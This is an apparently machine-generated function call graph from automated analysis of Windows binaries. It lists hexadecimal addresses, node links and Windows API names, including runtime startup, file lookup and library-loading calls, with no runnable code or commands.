77142->77133 77148 7ffdfb100040 13 API calls new[] 77142->77148 77144 7ffdfb0e49f9 77143->77144 77146 7ffdfb0e4a05 77143->77146 77151 7ffdfb0e4910 77144->77151 77146->77134 77147->77142 77148->77133 77149->77139 77150->77139 77152 7ffdfb0e494a 77151->77152 77155 7ffdfb0e495a 77151->77155 77157 7ffdfb0e4450 77152->77157 77154 7ffdfb0e49ad 77154->77146 77155->77154 77156 7ffdfb0e4450 45 API calls 77155->77156 77156->77155 77189 7ffdfb0e4150 77157->77189 77159 7ffdfb0e453a 77164 7ffdfb192920 4 API calls 77159->77164 77161 7ffdfb0e450c 77161->77159 77169 7ffdfb0e45f8 77161->77169 77173 7ffdfb0e45de 77161->77173 77220 7ffdfb083820 77161->77220 77162 7ffdfb0e48db 77262 7ffdfb0c1310 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77162->77262 77165 7ffdfb0e48fb 77164->77165 77165->77155 77167 7ffdfb0e4594 77168 7ffdfb0e459a 77167->77168 77167->77169 77171 7ffdfb066880 9 API calls 77168->77171 77168->77173 77170 7ffdfb0e469d 77169->77170 77175 7ffdfb0e4661 77169->77175 77172 7ffdfb066880 9 API calls 77170->77172 77174 7ffdfb0e45c7 77171->77174 77182 7ffdfb0e4681 77172->77182 77173->77159 77173->77162 77261 7ffdfb066c40 9 API calls 77173->77261 77174->77173 77178 7ffdfb0e45cf 00007FFE1A463010 77174->77178 77176 7ffdfb0e47bc 77175->77176 77177 7ffdfb0e4776 77175->77177 77175->77182 77229 7ffdfb069180 77176->77229 77179 7ffdfb066880 9 API calls 77177->77179 77178->77173 77179->77182 77182->77173 77260 7ffdfb084c10 29 API calls 77182->77260 77185 7ffdfb0e4827 77186 7ffdfb0e4855 77185->77186 77258 7ffdfb0be520 44 API calls 77185->77258 77186->77182 77259 7ffdfb0c13a0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77186->77259 77190 7ffdfb0e4172 77189->77190 77208 7ffdfb0e4404 77189->77208 77191 7ffdfb0e417b 77190->77191 77192 7ffdfb0e4193 77190->77192 77297 7ffdfb0e4040 9 API calls 77191->77297 77196 7ffdfb0e41d2 77192->77196 77201 7ffdfb0e4383 77192->77201 77194 7ffdfb0e4186 77194->77161 77197 7ffdfb0e4224 77196->77197 77298 7ffdfb0e4040 9 API calls 77196->77298 77263 7ffdfb0e4cf0 77197->77263 77200 7ffdfb0e4293 77203 7ffdfb0e42d8 77200->77203 77200->77208 77211 7ffdfb0e4322 77200->77211 77201->77208 77306 7ffdfb0e4040 9 API calls 77201->77306 77302 7ffdfb069350 9 API calls 77203->77302 77204 7ffdfb0e428b 77299 7ffdfb066c40 9 API calls 77204->77299 77205 7ffdfb0e4295 77205->77200 77300 7ffdfb123c10 11 API calls 77205->77300 77207 7ffdfb0e42e9 77303 7ffdfb069350 9 API calls 77207->77303 77208->77161 77304 7ffdfb0959e0 38 API calls 77211->77304 77213 7ffdfb0e4313 77213->77161 77215 7ffdfb0e42a6 77301 7ffdfb0e4040 9 API calls 77215->77301 77217 7ffdfb0e434e 77305 7ffdfb122350 29 API calls 77217->77305 77219 7ffdfb0e4374 77219->77161 77224 7ffdfb083857 77220->77224 77221 7ffdfb0838b9 77221->77167 77222 7ffdfb083a75 77222->77221 77354 7ffdfb07b2c0 9 API calls new[] 77222->77354 77224->77221 77224->77222 77342 7ffdfb083400 77224->77342 77351 7ffdfb07a660 RaiseException IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77224->77351 77352 7ffdfb083750 9 API calls 77224->77352 77353 7ffdfb077280 19 API calls 77224->77353 77372 7ffdfb0690b0 77229->77372 77232 7ffdfb0dcfb0 77233 7ffdfb0dcfe6 77232->77233 77234 7ffdfb0dcfdd 77232->77234 77233->77234 77256 7ffdfb0dd050 77233->77256 77431 7ffdfb069350 9 API calls 77234->77431 77236 7ffdfb0dd015 77432 7ffdfb069350 9 API calls 77236->77432 77238 7ffdfb0dd45d 77242 7ffdfb0dd4bd 77238->77242 77438 7ffdfb0959e0 38 API calls 77238->77438 77239 7ffdfb0dd03f 77239->77185 77245 7ffdfb0dd5f4 77242->77245 77439 7ffdfb123c10 11 API calls 77242->77439 77245->77185 77247 7ffdfb0dd5ec new[] 77247->77245 77249 7ffdfb0dd61d 00007FFE1A463010 77247->77249 77248 7ffdfb066880 9 API calls 77248->77256 77249->77245 77250 7ffdfb0dd471 77437 7ffdfb095a70 38 API calls 77250->77437 77254 7ffdfb0dd45f 77436 7ffdfb066c40 9 API calls 77254->77436 77256->77238 77256->77248 77256->77250 77256->77254 77257 7ffdfb0e4150 41 API calls 77256->77257 77397 7ffdfb0e52a0 77256->77397 77409 7ffdfb098ff0 77256->77409 77433 7ffdfb09a0d0 11 API calls 77256->77433 77434 7ffdfb091530 11 API calls 77256->77434 77435 7ffdfb095a70 38 API calls 77256->77435 77257->77256 77258->77186 77259->77182 77260->77173 77261->77162 77262->77159 77264 7ffdfb0e4d64 77263->77264 77265 7ffdfb0e4ddf 77264->77265 77267 7ffdfb0e4dfd 77264->77267 77319 7ffdfb06a510 9 API calls 77265->77319 77270 7ffdfb0e4ef7 77267->77270 77285 7ffdfb0e4ed2 77267->77285 77268 7ffdfb0e4fbb 77307 7ffdfb11fcf0 77268->77307 77269 7ffdfb0e4f2a 77273 7ffdfb0e4f5b 77269->77273 77274 7ffdfb0e4f33 77269->77274 77270->77268 77270->77269 77272 7ffdfb192920 4 API calls 77276 7ffdfb0e4262 77272->77276 77275 7ffdfb0e4f94 77273->77275 77278 7ffdfb066880 9 API calls 77273->77278 77321 7ffdfb06a380 11 API calls 77274->77321 77284 7ffdfb066880 9 API calls 77275->77284 77293 7ffdfb0e503a 77275->77293 77276->77200 77276->77204 77276->77205 77279 7ffdfb0e4f6c 77278->77279 77279->77275 77281 7ffdfb0e4f74 00007FFE1A463010 77279->77281 77280 7ffdfb0e504e 77283 7ffdfb0e51a5 77280->77283 77325 7ffdfb095a70 38 API calls 77280->77325 77282 7ffdfb11fcf0 9 API calls 77281->77282 77282->77275 77290 7ffdfb0e4df0 77283->77290 77326 7ffdfb06a380 11 API calls 77283->77326 77289 7ffdfb0e501d 77284->77289 77320 7ffdfb06a380 11 API calls 77285->77320 77291 7ffdfb0e5025 00007FFE1A463010 77289->77291 77289->77293 77290->77272 77291->77293 77292 7ffdfb083820 21 API calls 77292->77293 77293->77280 77293->77290 77293->77292 77322 7ffdfb066c40 9 API calls 77293->77322 77323 7ffdfb0c1310 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77293->77323 77324 7ffdfb084c10 29 API calls 77293->77324 77297->77194 77298->77197 77299->77200 77300->77215 77301->77200 77302->77207 77303->77213 77304->77217 77305->77219 77306->77208 77314 7ffdfb11fd41 77307->77314 77309 7ffdfb120160 77338 7ffdfb069350 9 API calls 77309->77338 77311 7ffdfb120109 77337 7ffdfb06a510 9 API calls 77311->77337 77313 7ffdfb069180 9 API calls 77313->77309 77314->77311 77316 7ffdfb12004e 77314->77316 77327 7ffdfb11f160 77314->77327 77315 7ffdfb192920 4 API calls 77317 7ffdfb1202c0 77315->77317 77316->77309 77316->77313 77318 7ffdfb12017d 77316->77318 77317->77275 77318->77315 77319->77290 77320->77290 77321->77290 77322->77293 77323->77293 77324->77293 77325->77283 77326->77290 77330 7ffdfb11f1a3 77327->77330 77328 7ffdfb11f2bd 77331 7ffdfb11f299 77328->77331 77332 7ffdfb11f2f0 77328->77332 77333 7ffdfb11f303 77328->77333 77329 7ffdfb11f27b 77329->77331 77339 7ffdfb11c330 9 API calls 77329->77339 77330->77328 77330->77329 77331->77314 77340 7ffdfb06a510 9 API calls 77332->77340 77341 7ffdfb06a510 9 API calls 77333->77341 77337->77316 77338->77318 77339->77331 77340->77331 77341->77331 77355 7ffdfb079d10 77342->77355 77345 7ffdfb0835ed 77348 7ffdfb083534 77345->77348 77368 7ffdfb077280 19 API calls 77345->77368 77346 7ffdfb083432 77346->77345 77346->77348 77367 7ffdfb125b10 9 API calls 77346->77367 77348->77224 77350 7ffdfb07a0e0 19 API calls 77350->77346 77351->77224 77352->77224 77353->77224 77354->77221 77359 7ffdfb079f2f 77355->77359 77363 7ffdfb079d40 77355->77363 77357 7ffdfb192920 4 API calls 77358 7ffdfb07a0c9 77357->77358 77358->77348 77358->77350 77364 7ffdfb079dd1 77359->77364 77371 7ffdfb07ecd0 12 API calls 77359->77371 77360 7ffdfb079ed5 77360->77359 77360->77364 77366 7ffdfb06d9f0 16 API calls 77360->77366 77361 7ffdfb079e92 77361->77360 77361->77364 77370 7ffdfb077ca0 11 API calls 77361->77370 77363->77359 77363->77360 77363->77361 77363->77364 77369 7ffdfb125b50 9 API calls 77363->77369 77364->77357 77366->77359 77367->77345 77368->77348 77369->77361 77370->77360 77371->77364 77381 7ffdfb066ec0 77372->77381 77374 7ffdfb06914f 77377 7ffdfb192920 4 API calls 77374->77377 77379 7ffdfb069162 77377->77379 77379->77232 77380 7ffdfb069136 77380->77374 77394 7ffdfb066c40 9 API calls 77380->77394 77384 7ffdfb066f09 77381->77384 77382 7ffdfb192920 4 API calls 77383 7ffdfb068643 77382->77383 77383->77380 77393 7ffdfb068cd0 9 API calls new[] 77383->77393 77386 7ffdfb066f93 77384->77386 77387 7ffdfb066f83 77384->77387 77390 7ffdfb066fd1 77384->77390 77391 7ffdfb066f91 77384->77391 77389 7ffdfb066f97 00007FFE1A463010 77386->77389 77386->77391 77395 7ffdfb068c00 9 API calls 77387->77395 77389->77391 77390->77382 77392 7ffdfb067323 77390->77392 77391->77390 77396 7ffdfb068c00 9 API calls 77391->77396 77393->77380 77394->77374 77395->77391 77396->77390 77398 7ffdfb0e532e 77397->77398 77399 7ffdfb0e52d8 77397->77399 77398->77399 77400 7ffdfb0e5350 77398->77400 77440 7ffdfb069350 9 API calls 77399->77440 77402 7ffdfb0e52f0 77400->77402 77407 7ffdfb0e5355 77400->77407 77441 7ffdfb069350 9 API calls 77402->77441 77404 7ffdfb0e531a 77404->77256 77405 7ffdfb0e4cf0 40 API calls 77405->77407 77406 7ffdfb0e544d 77406->77256 77407->77405 77407->77406 77442 7ffdfb0cb0c0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77407->77442 77410 7ffdfb099017 77409->77410 77411 7ffdfb099004 77409->77411 77412 7ffdfb09902d 77410->77412 77459 7ffdfb069350 9 API calls 77410->77459 77458 7ffdfb069350 9 API calls 77411->77458 77415 7ffdfb099015 77412->77415 77416 7ffdfb099071 77412->77416 77460 7ffdfb069350 9 API calls 77415->77460 77443 7ffdfb098d60 77416->77443 77418 7ffdfb099064 77418->77256 77422 7ffdfb0990f6 77426 7ffdfb099102 77422->77426 77463 7ffdfb091530 11 API calls 77422->77463 77423 7ffdfb099095 77423->77422 77425 7ffdfb098d60 38 API calls 77423->77425 77427 7ffdfb0990f1 77423->77427 77461 7ffdfb0e54c0 40 API calls 77423->77461 77462 7ffdfb097ee0 38 API calls 77423->77462 77425->77423 77426->77427 77428 7ffdfb066880 9 API calls 77426->77428 77427->77256 77429 7ffdfb09917b 77428->77429 77429->77427 77430 7ffdfb099183 00007FFE1A463010 77429->77430 77430->77427 77431->77236 77432->77239 77433->77256 77434->77256 77435->77256 77436->77238 77437->77238 77438->77242 77439->77247 77440->77402 77441->77404 77442->77407 77444 7ffdfb098d7d 77443->77444 77454 7ffdfb098dd5 77443->77454 77447 7ffdfb098d9c 77444->77447 77444->77454 77484 7ffdfb097ee0 38 API calls 77444->77484 77445 7ffdfb098e55 77464 7ffdfb09bdc0 77445->77464 77446 7ffdfb098e4e 77486 7ffdfb093ec0 11 API calls 77446->77486 77448 7ffdfb098da5 77447->77448 77447->77454 77457 7ffdfb098e6d 77448->77457 77485 7ffdfb0958e0 11 API calls 77448->77485 77453 7ffdfb098dc6 77453->77423 77454->77445 77454->77446 77455 7ffdfb098e53 77455->77457 77487 7ffdfb0958e0 11 API calls 77455->77487 77457->77423 77458->77415 77459->77412 77460->77418 77461->77423 77462->77423 77463->77426 77465 7ffdfb09be56 77464->77465 77469 7ffdfb09bede 77465->77469 77488 7ffdfb066c40 9 API calls 77465->77488 77467 7ffdfb0a2508 77489 7ffdfb091eb0 9 API calls 77467->77489 77470 7ffdfb0a25ab 77491 7ffdfb069350 9 API calls 77470->77491 77471 7ffdfb0a2517 77471->77455 77471->77470 77490 7ffdfb091eb0 9 API calls 77471->77490 77474 7ffdfb0a25f6 77475 7ffdfb0a2607 77474->77475 77492 7ffdfb095530 36 API calls 77474->77492 77477 7ffdfb0a2618 77475->77477 77493 7ffdfb066c40 9 API calls 77475->77493 77480 7ffdfb0a20c4 77477->77480 77494 7ffdfb0c1310 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77477->77494 77481 7ffdfb192920 4 API calls 77480->77481 77483 7ffdfb0a20f7 77480->77483 77482 7ffdfb0a26d3 77481->77482 77482->77455 77483->77455 77484->77444 77485->77453 77486->77455 77487->77457 77488->77467 77489->77471 77490->77470 77491->77474 77492->77475 77493->77477 77494->77480 77495 7ff6f0bdccac 77516 7ff6f0bdce7c 77495->77516 77498 7ff6f0bdcdf8 77665 7ff6f0bdd19c 7 API calls 2 library calls 77498->77665 77499 7ff6f0bdccc8 __scrt_acquire_startup_lock 77501 7ff6f0bdce02 77499->77501 77506 7ff6f0bdcce6 __scrt_release_startup_lock 77499->77506 77666 7ff6f0bdd19c 7 API calls 2 library calls 77501->77666 77503 7ff6f0bdcd0b 77504 7ff6f0bdce0d _CallSETranslator 77505 7ff6f0bdcd91 77522 7ff6f0bdd2e4 77505->77522 77506->77503 77506->77505 77662 7ff6f0be9b9c 45 API calls 77506->77662 77508 7ff6f0bdcd96 77525 7ff6f0bd1000 77508->77525 77513 7ff6f0bdcdb9 77513->77504 77664 7ff6f0bdd000 7 API calls 77513->77664 77515 7ff6f0bdcdd0 77515->77503 77517 7ff6f0bdce84 77516->77517 77518 7ff6f0bdce90 __scrt_dllmain_crt_thread_attach 77517->77518 77519 7ff6f0bdccc0 77518->77519 77520 7ff6f0bdce9d 77518->77520 77519->77498 77519->77499 77520->77519 77667 7ff6f0bdd8f8 7 API calls 2 library calls 77520->77667 77668 7ff6f0bfa540 77522->77668 77526 7ff6f0bd1009 77525->77526 77670 7ff6f0be54f4 77526->77670 77528 7ff6f0bd37fb 77677 7ff6f0bd36b0 77528->77677 77532 7ff6f0bdc5c0 _log10_special 8 API calls 77536 7ff6f0bd3ca7 77532->77536 77534 7ff6f0bd391b 77538 7ff6f0bd45b0 108 API calls 77534->77538 77535 7ff6f0bd383c 77537 7ff6f0bd1c80 49 API calls 77535->77537 77663 7ff6f0bdd328 GetModuleHandleW 77536->77663 77539 7ff6f0bd385b 77537->77539 77540 7ff6f0bd392b 77538->77540 77749 7ff6f0bd8a20 77539->77749 77542 7ff6f0bd396a 77540->77542 77772 7ff6f0bd7f80 77540->77772 77781 7ff6f0bd2710 54 API calls _log10_special 77542->77781 77544 7ff6f0bd388e 77553 7ff6f0bd38bb __vcrt_freefls 77544->77553 77771 7ff6f0bd8b90 40 API calls __vcrt_freefls 77544->77771 77546 7ff6f0bd395d 77547 7ff6f0bd3962 77546->77547 77548 7ff6f0bd3984 77546->77548 77551 7ff6f0be00bc 74 API calls 77547->77551 77549 7ff6f0bd1c80 49 API calls 77548->77549 77552 7ff6f0bd39a3 77549->77552 77551->77542 77558 7ff6f0bd1950 115 API calls 77552->77558 77555 7ff6f0bd8a20 14 API calls 77553->77555 77562 7ff6f0bd38de __vcrt_freefls 77553->77562 77555->77562 77556 7ff6f0bd3a0b 77784 7ff6f0bd8b90 40 API calls __vcrt_freefls 77556->77784 77560 7ff6f0bd39ce 77558->77560 77559 7ff6f0bd3a17 77785 7ff6f0bd8b90 40 API calls __vcrt_freefls 77559->77785 77560->77539 77563 7ff6f0bd39de 77560->77563 77567 7ff6f0bd390e __vcrt_freefls 77562->77567 77783 7ff6f0bd8b30 40 API calls __vcrt_freefls 77562->77783 77782 7ff6f0bd2710 54 API calls _log10_special 77563->77782 77564 7ff6f0bd3a23 77786 7ff6f0bd8b90 40 API calls __vcrt_freefls 77564->77786 77568 7ff6f0bd8a20 14 API calls 77567->77568 77569 7ff6f0bd3a3b 77568->77569 77570 7ff6f0bd3b2f 77569->77570 77571 7ff6f0bd3a60 __vcrt_freefls 77569->77571 77788 7ff6f0bd2710 54 API calls _log10_special 77570->77788 77583 7ff6f0bd3aab 77571->77583 77787 7ff6f0bd8b30 40 API calls __vcrt_freefls 77571->77787 77574 7ff6f0bd8a20 14 API calls 77575 7ff6f0bd3bf4 __vcrt_freefls 77574->77575 77576 7ff6f0bd3d41 77575->77576 77577 7ff6f0bd3c46 77575->77577 77793 7ff6f0bd44d0 49 API calls 77576->77793 77579 7ff6f0bd3cd4 77577->77579 77580 7ff6f0bd3c50 77577->77580 77582 7ff6f0bd8a20 14 API calls 77579->77582 77789 7ff6f0bd90e0 59 API calls _log10_special 77580->77789 77581 7ff6f0bd3d4f 77587 7ff6f0bd3d65 77581->77587 77588 7ff6f0bd3d71 77581->77588 77585 7ff6f0bd3ce0 77582->77585 77583->77574 77590 7ff6f0bd3c61 77585->77590 77593 7ff6f0bd3ced 77585->77593 77586 7ff6f0bd3c55 77589 7ff6f0bd3cb3 77586->77589 77586->77590 77794 7ff6f0bd4620 77587->77794 77592 7ff6f0bd1c80 49 API calls 77588->77592 77791 7ff6f0bd8850 86 API calls 2 library calls 77589->77791 77790 7ff6f0bd2710 54 API calls _log10_special 77590->77790 77600 7ff6f0bd3d2b __vcrt_freefls 77592->77600 77596 7ff6f0bd1c80 49 API calls 77593->77596 77599 7ff6f0bd3d0b 77596->77599 77597 7ff6f0bd3dc4 77603 7ff6f0bd9400 2 API calls 77597->77603 77598 7ff6f0bd3cbb 77601 7ff6f0bd3cbf 77598->77601 77602 7ff6f0bd3cc8 77598->77602 77599->77600 77604 7ff6f0bd3d12 77599->77604 77600->77597 77605 7ff6f0bd3da7 SetDllDirectoryW LoadLibraryExW 77600->77605 77601->77590 77602->77600 77606 7ff6f0bd3dd7 SetDllDirectoryW 77603->77606 77792 7ff6f0bd2710 54 API calls _log10_special 77604->77792 77605->77597 77609 7ff6f0bd3e0a 77606->77609 77652 7ff6f0bd3e5a 77606->77652 77611 7ff6f0bd8a20 14 API calls 77609->77611 77610 7ff6f0bd3808 __vcrt_freefls 77610->77532 77620 7ff6f0bd3e16 __vcrt_freefls 77611->77620 77612 7ff6f0bd3ffc 77614 7ff6f0bd4006 PostMessageW GetMessageW 77612->77614 77615 7ff6f0bd4029 77612->77615 77613 7ff6f0bd3f1b 77805 7ff6f0bd33c0 121 API calls 2 library calls 77613->77805 77614->77615 77762 7ff6f0bd3360 77615->77762 77617 7ff6f0bd3f23 77617->77610 77618 7ff6f0bd3f2b 77617->77618 77806 7ff6f0bd90c0 LocalFree 77618->77806 77623 7ff6f0bd3ef2 77620->77623 77626 7ff6f0bd3e4e 77620->77626 77804 7ff6f0bd8b30 40 API calls __vcrt_freefls 77623->77804 77626->77652 77797 7ff6f0bd6db0 54 API calls _get_daylight 77626->77797 77630 7ff6f0bd4043 77808 7ff6f0bd6fb0 FreeLibrary 77630->77808 77634 7ff6f0bd404f 77636 7ff6f0bd3e6c 77798 7ff6f0bd7330 117 API calls 2 library calls 77636->77798 77640 7ff6f0bd3e81 77643 7ff6f0bd3ea2 77640->77643 77655 7ff6f0bd3e85 77640->77655 77799 7ff6f0bd6df0 120 API calls _log10_special 77640->77799 77643->77655 77800 7ff6f0bd71a0 125 API calls 77643->77800 77647 7ff6f0bd3ee0 77803 7ff6f0bd6fb0 FreeLibrary 77647->77803 77649 7ff6f0bd3eb7 77649->77655 77801 7ff6f0bd74e0 55 API calls 77649->77801 77652->77612 77652->77613 77655->77652 77802 7ff6f0bd2a50 54 API calls _log10_special 77655->77802 77662->77505 77663->77513 77664->77515 77665->77501 77666->77504 77667->77519 77669 7ff6f0bdd2fb GetStartupInfoW 77668->77669 77669->77508 77673 7ff6f0bef4f0 77670->77673 77671 7ff6f0bef543 77809 7ff6f0bea884 37 API calls 2 library calls 77671->77809 77673->77671 77675 7ff6f0bef596 77673->77675 77674 7ff6f0bef56c 77674->77528 77810 7ff6f0bef3c8 71 API calls _fread_nolock 77675->77810 77811 7ff6f0bdc8c0 77677->77811 77680 7ff6f0bd3710 77813 7ff6f0bd92f0 FindFirstFileExW 77680->77813 77681 7ff6f0bd36eb GetLastError 77818 7ff6f0bd2c50 51 API calls _log10_special 77681->77818 77684 7ff6f0bd3706 77689 7ff6f0bdc5c0 _log10_special 8 API calls 77684->77689 77686 7ff6f0bd3723 77819 7ff6f0bd9370 CreateFileW GetFinalPathNameByHandleW CloseHandle 77686->77819 77687 7ff6f0bd377d 77821 7ff6f0bd94b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 77687->77821 77692 7ff6f0bd37b5 77689->77692 77691 7ff6f0bd378b 77691->77684 77822 7ff6f0bd2810 49 API calls _log10_special 77691->77822 77692->77610 77699 7ff6f0bd1950 77692->77699 77693 7ff6f0bd3730 77694 7ff6f0bd3734 77693->77694 77695 7ff6f0bd374c __vcrt_InitializeCriticalSectionEx 77693->77695 77820 7ff6f0bd2810 49 API calls _log10_special 77694->77820 77695->77687 77698 7ff6f0bd3745 77698->77684 77700 7ff6f0bd45b0 108 API calls 77699->77700 77701 7ff6f0bd1985 77700->77701 77702 7ff6f0bd1c43 77701->77702 77704 7ff6f0bd7f80 83 API calls 77701->77704 77703 7ff6f0bdc5c0 _log10_special 8 API calls 77702->77703 77705 7ff6f0bd1c5e 77703->77705 77706 7ff6f0bd19cb 77704->77706 77705->77534 77705->77535 77707 7ff6f0be0744 73 API calls 77706->77707 77748 7ff6f0bd1a03 77706->77748 77709 7ff6f0bd19e5 77707->77709 77708 7ff6f0be00bc 74 API calls 77708->77702 77710 7ff6f0bd1a08 77709->77710 77711 7ff6f0bd19e9 77709->77711 77712 7ff6f0be040c _fread_nolock 53 API calls 77710->77712 77823 7ff6f0be4f78 11 API calls _get_daylight 77711->77823 77714 7ff6f0bd1a20 77712->77714 77717 7ff6f0bd1a26 77714->77717 77720 7ff6f0bd1a45 77714->77720 77715 7ff6f0bd19ee 77824 7ff6f0bd2910 54 API calls _log10_special 77715->77824 77825 7ff6f0be4f78 11 API calls _get_daylight 77717->77825 77719 7ff6f0bd1a2b 77826 7ff6f0bd2910 54 API calls _log10_special 77719->77826 77722 7ff6f0bd1a7b 77720->77722 77723 7ff6f0bd1a5c 77720->77723 77724 7ff6f0bd1c80 49 API calls 77722->77724 77827 7ff6f0be4f78 11 API calls _get_daylight 77723->77827 77726 7ff6f0bd1a92 77724->77726 77729 7ff6f0bd1c80 49 API calls 77726->77729 77727 7ff6f0bd1a61 77828 7ff6f0bd2910 54 API calls _log10_special 77727->77828 77730 7ff6f0bd1add 77729->77730 77731 7ff6f0be0744 73 API calls 77730->77731 77732 7ff6f0bd1b01 77731->77732 77733 7ff6f0bd1b35 77732->77733 77734 7ff6f0bd1b16 77732->77734 77735 7ff6f0be040c _fread_nolock 53 API calls 77733->77735 77829 7ff6f0be4f78 11 API calls _get_daylight 77734->77829 77737 7ff6f0bd1b4a 77735->77737 77739 7ff6f0bd1b6f 77737->77739 77740 7ff6f0bd1b50 77737->77740 77738 7ff6f0bd1b1b 77830 7ff6f0bd2910 54 API calls _log10_special 77738->77830 77833 7ff6f0be0180 37 API calls 2 library calls 77739->77833 77831 7ff6f0be4f78 11 API calls _get_daylight 77740->77831 77744 7ff6f0bd1b55 77832 7ff6f0bd2910 54 API calls _log10_special 77744->77832 77745 7ff6f0bd1b89 77745->77748 77834 7ff6f0bd2710 54 API calls _log10_special 77745->77834 77748->77708 77750 7ff6f0bd8a2a 77749->77750 77751 7ff6f0bd9400 2 API calls 77750->77751 77752 7ff6f0bd8a49 GetEnvironmentVariableW 77751->77752 77753 7ff6f0bd8ab2 77752->77753 77754 7ff6f0bd8a66 ExpandEnvironmentStringsW 77752->77754 77756 7ff6f0bdc5c0 _log10_special 8 API calls 77753->77756 77754->77753 77755 7ff6f0bd8a88 77754->77755 77835 7ff6f0bd94b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 77755->77835 77757 7ff6f0bd8ac4 77756->77757 77757->77544 77759 7ff6f0bd8a9a 77760 7ff6f0bdc5c0 _log10_special 8 API calls 77759->77760 77761 7ff6f0bd8aaa 77760->77761 77761->77544 77836 7ff6f0bd6350 77762->77836 77766 7ff6f0bd3381 77770 7ff6f0bd3399 77766->77770 77904 7ff6f0bd6040 77766->77904 77768 7ff6f0bd338d 77768->77770 77913 7ff6f0bd61d0 54 API calls 77768->77913 77807 7ff6f0bd3670 FreeLibrary 77770->77807 77771->77553 77773 7ff6f0bd7fa4 77772->77773 77774 7ff6f0bd807b __vcrt_freefls 77773->77774 77775 7ff6f0be0744 73 API calls 77773->77775 77774->77546 77776 7ff6f0bd7fc0 77775->77776 77776->77774 77967 7ff6f0be7938 77776->77967 77778 7ff6f0bd7fd5 77778->77774 77779 7ff6f0be0744 73 API calls 77778->77779 77780 7ff6f0be040c _fread_nolock 53 API calls 77778->77780 77779->77778 77780->77778 77781->77610 77782->77610 77783->77556 77784->77559 77785->77564 77786->77567 77787->77583 77788->77610 77789->77586 77790->77610 77791->77598 77792->77610 77793->77581 77795 7ff6f0bd1c80 49 API calls 77794->77795 77796 7ff6f0bd4650 77795->77796 77796->77600 77797->77636 77798->77640 77799->77643 77800->77649 77801->77655 77802->77647 77803->77652 77804->77652 77805->77617 77807->77630 77808->77634 77809->77674 77810->77674 77812 7ff6f0bd36bc GetModuleFileNameW 77811->77812 77812->77680 77812->77681 77814 7ff6f0bd932f FindClose 77813->77814 77815 7ff6f0bd9342 77813->77815 77814->77815 77816 7ff6f0bdc5c0 _log10_special 8 API calls 77815->77816 77817 7ff6f0bd371a 77816->77817 77817->77686 77817->77687 77818->77684 77819->77693 77820->77698 77821->77691 77822->77684 77823->77715 77824->77748 77825->77719 77826->77748 77827->77727 77828->77748 77829->77738 77830->77748 77831->77744 77832->77748 77833->77745 77834->77748 77835->77759 77837 7ff6f0bd6365 77836->77837 77838 7ff6f0bd1c80 49 API calls 77837->77838 77839 7ff6f0bd63a1 77838->77839 77840 7ff6f0bd63aa 77839->77840 77841 7ff6f0bd63cd 77839->77841 77924 7ff6f0bd2710 54 API calls _log10_special 77840->77924 77843 7ff6f0bd4620 49 API calls 77841->77843 77845 7ff6f0bd63e5 77843->77845 77844 7ff6f0bd63c3 77849 7ff6f0bdc5c0 _log10_special 8 API calls 77844->77849 77846 7ff6f0bd6403 77845->77846 77925 7ff6f0bd2710 54 API calls _log10_special 77845->77925 77914 7ff6f0bd4550 77846->77914 77851 7ff6f0bd336e 77849->77851 77851->77770 77867 7ff6f0bd64f0 77851->77867 77852 7ff6f0bd641b 77854 7ff6f0bd4620 49 API calls 77852->77854 77855 7ff6f0bd6434 77854->77855 77856 7ff6f0bd6459 77855->77856 77857 7ff6f0bd6439 77855->77857 77859 7ff6f0bd9070 3 API calls 77856->77859 77926 7ff6f0bd2710 54 API calls _log10_special 77857->77926 77860 7ff6f0bd6466 77859->77860 77861 7ff6f0bd6472 77860->77861 77862 7ff6f0bd64b1 77860->77862 77863 7ff6f0bd9400 2 API calls 77861->77863 77928 7ff6f0bd5820 137 API calls 77862->77928 77865 7ff6f0bd648a GetLastError 77863->77865 77927 7ff6f0bd2c50 51 API calls _log10_special 77865->77927 77929 7ff6f0bd53f0 77867->77929 77869 7ff6f0bd6516 77870 7ff6f0bd651e 77869->77870 77871 7ff6f0bd652f 77869->77871 77954 7ff6f0bd2710 54 API calls _log10_special 77870->77954 77936 7ff6f0bd4c80 77871->77936 77875 7ff6f0bd653b 77955 7ff6f0bd2710 54 API calls _log10_special 77875->77955 77876 7ff6f0bd654c 77879 7ff6f0bd655c 77876->77879 77881 7ff6f0bd656d 77876->77881 77878 7ff6f0bd652a 77878->77766 77956 7ff6f0bd2710 54 API calls _log10_special 77879->77956 77882 7ff6f0bd658c 77881->77882 77883 7ff6f0bd659d 77881->77883 77957 7ff6f0bd2710 54 API calls _log10_special 77882->77957 77885 7ff6f0bd65ac 77883->77885 77886 7ff6f0bd65bd 77883->77886 77958 7ff6f0bd2710 54 API calls _log10_special 77885->77958 77940 7ff6f0bd4d40 77886->77940 77890 7ff6f0bd65cc 77959 7ff6f0bd2710 54 API calls _log10_special 77890->77959 77891 7ff6f0bd65dd 77893 7ff6f0bd65ec 77891->77893 77894 7ff6f0bd65fd 77891->77894 77960 7ff6f0bd2710 54 API calls _log10_special 77893->77960 77896 7ff6f0bd660f 77894->77896 77898 7ff6f0bd6620 77894->77898 77961 7ff6f0bd2710 54 API calls _log10_special 77896->77961 77901 7ff6f0bd664a 77898->77901 77962 7ff6f0be7320 73 API calls 77898->77962 77900 7ff6f0bd6638 77963 7ff6f0be7320 73 API calls 77900->77963 77901->77878 77964 7ff6f0bd2710 54 API calls _log10_special 77901->77964 77905 7ff6f0bd6060 77904->77905 77905->77905 77906 7ff6f0bd6089 77905->77906 77909 7ff6f0bd60a0 __vcrt_freefls 77905->77909 77966 7ff6f0bd2710 54 API calls _log10_special 77906->77966 77908 7ff6f0bd6095 77908->77768 77910 7ff6f0bd1470 116 API calls 77909->77910 77911 7ff6f0bd2710 54 API calls 77909->77911 77912 7ff6f0bd61ab 77909->77912 77910->77909 77911->77909 77912->77768 77913->77770 77915 7ff6f0bd455a 77914->77915 77916 7ff6f0bd9400 2 API calls 77915->77916 77917 